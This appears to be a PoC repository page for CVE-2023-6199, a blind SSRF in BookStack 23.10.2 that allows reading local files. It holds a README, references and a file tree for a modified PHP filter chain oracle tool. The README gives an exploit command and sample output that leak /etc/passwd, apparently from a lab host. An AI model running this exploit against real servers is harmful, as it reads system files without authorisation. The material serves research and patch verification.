
CVE-2023-6199 PoC — Book Stack v23.10.2 - LFR via Blind SSRF

Associated vulnerability

Title: Book Stack v23.10.2 - LFR via Blind SSRF (CVE-2023-6199)

Description: Book Stack version 23.10.2 allows filtering local files on the server. This is possible because the application is vulnerable to SSRF.

Description

A CLI to exploit parameters vulnerable to the PHP filter chain error-based oracle, modified to exploit CVE-2023-6199.
Readme
# PHP filter chains: file read from error-based oracle. Updated Script to exploit CVE-2023-6199

A CLI to exploit parameters affected by the file read enabled by the error-based oracle of PHP filter chains. It can be used to leak the content of a local file when the parameter is passed to vulnerable functions, such as `file()`, `hash_file()`, `file_get_contents()` or `copy()`, even when the server does not return the file content.
In this case it is used to read files by exploiting an SSRF vulnerability in Book Stack version 23.10.2, identified by CVE-2023-6199, which allows filtering local files on the server.

## Example of Usage

```bash
$ python3 filters_chain_oracle_exploit.py --parameter html --headers '{"Content-Type": "application/x-www-form-urlencoded","X-CSRF-TOKEN":"your_CSRF_token","Cookie":"bookstack_session=your_session_token"}' --verb PUT --target http://localhost:80/ajax/page/your_page_number/save-draft --file '/etc/passwd'
```

```bash
[*] The following URL is targeted : http://checker.htb/ajax/page/9/save-draft
[*] The following local file is leaked : /etc/passwd
[*] Running PUT requests
[*] Additionnal headers used : {"Content-Type": "application/x-www-form-urlencoded","X-CSRF-TOKEN":"your_CSRF_token","Cookie":"bookstack_session=your_session_token"}
[+] File /etc/passwd leak is finished!
```

## References

- [CVE-2023-6199 - MITRE](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6199)
- [LFR via Blind SSRF in BookStack - Fluid Attacks](https://fluidattacks.com/blog/lfr-via-blind-ssrf-book-stack/?utm_source=mailing&utm_medium=activecampaign&utm_campaign=blognov22)
- [PHP Filter Chains Oracle Exploit - Synacktiv](https://github.com/synacktiv/php_filter_chains_oracle_exploit)
## File Snapshot

```
[4.0K] /data/pocs/59ea3a10664bd81ce96c2cb3189aa889878eee6b
├── [4.0K] filters_chain_oracle
│   ├── [4.0K] core
│   │   ├── [ 16K] bruteforcer.py
│   │   ├── [6.3K] requestor.py
│   │   ├── [ 303] utils.py
│   │   └── [ 157] verb.py
│   └── [4.0K] tests
│       ├── [   0] __init__.py
│       └── [4.7K] test.py
├── [7.5K] filters_chain_oracle_exploit.py
├── [ 368] LICENSE
├── [1.7K] README.md
└── [   9] requirements.txt

3 directories, 10 files
```